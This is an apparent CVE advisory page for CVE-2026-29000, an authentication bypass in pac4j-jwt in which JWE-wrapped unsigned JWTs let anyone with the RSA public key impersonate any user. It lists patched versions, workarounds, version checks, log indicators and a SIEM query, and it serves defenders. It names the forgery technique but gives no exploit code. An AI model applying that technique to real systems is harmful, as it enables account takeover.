CVE-2026-29000
📋 TL;DR
This critical authentication bypass vulnerability in pac4j-jwt allows attackers with the server's RSA public key to forge JWT authentication tokens and authenticate as any user, including administrators. It affects all systems using vulnerable versions of pac4j-jwt for JWT-based authentication.
💻 Affected Systems
- pac4j-jwt
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Complete system compromise where attackers gain administrative access, potentially leading to data theft, privilege escalation, and full control over affected applications.
Likely Case
Unauthorized access to sensitive data and functionality, account takeover, and privilege escalation within applications using pac4j-jwt authentication.
If Mitigated
Limited impact if proper network segmentation, monitoring, and additional authentication layers are in place, though authentication bypass remains possible.
🎯 Exploit Status
Attackers need the server's RSA public key, which is often publicly accessible in JWT authentication setups. The exploit technique is documented in security advisories.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 4.5.9, 5.7.9, or 6.3.3 depending on major version
Vendor Advisory: https://www.pac4j.org/blog/security-advisory-pac4j-jwt-jwtauthenticator.html
Restart Required: Yes
Instructions:
1. Identify your pac4j-jwt major version (4.x, 5.x, or 6.x). 2. Update to the corresponding patched version: 4.5.9 for 4.x, 5.7.9 for 5.x, or 6.3.3 for 6.x. 3. Restart your application. 4. Test authentication functionality.
🔧 Temporary Workarounds
Disable JWE-wrapped PlainJWT support
allConfigure JwtAuthenticator to reject JWE-wrapped PlainJWT tokens entirely
Configure JwtAuthenticator to only accept signed JWTs and reject JWE-wrapped PlainJWT
🧯 If You Can't Patch
- Implement additional authentication layer (MFA, IP whitelisting)
- Monitor authentication logs for suspicious JWT patterns and implement rate limiting
🔍 How to Verify
Check if Vulnerable:
Check your pac4j-jwt version in dependency files (pom.xml, build.gradle) or runtime. If version is below 4.5.9, 5.7.9, or 6.3.3 depending on major version, you are vulnerable.Check Version:
Check project dependency files or use: mvn dependency:tree | grep pac4j-jwt (for Maven) or gradle dependencies | grep pac4j-jwt (for Gradle)Verify Fix Applied:
Verify the updated version in your dependency files and test that JWE-wrapped PlainJWT tokens with arbitrary claims are properly rejected.📡 Detection & Monitoring
Log Indicators:
- Authentication attempts with JWE-wrapped PlainJWT tokens
- Successful authentication with unexpected user roles or subjects
- Multiple authentication attempts with varying JWT claims
Network Indicators:
- Unusual JWT token patterns in authentication requests
- Requests containing JWE-wrapped PlainJWT with modified claims
SIEM Query:
source="authentication_logs" AND (message="JWE-wrapped PlainJWT" OR message="unexpected JWT claim" OR message="authentication bypass")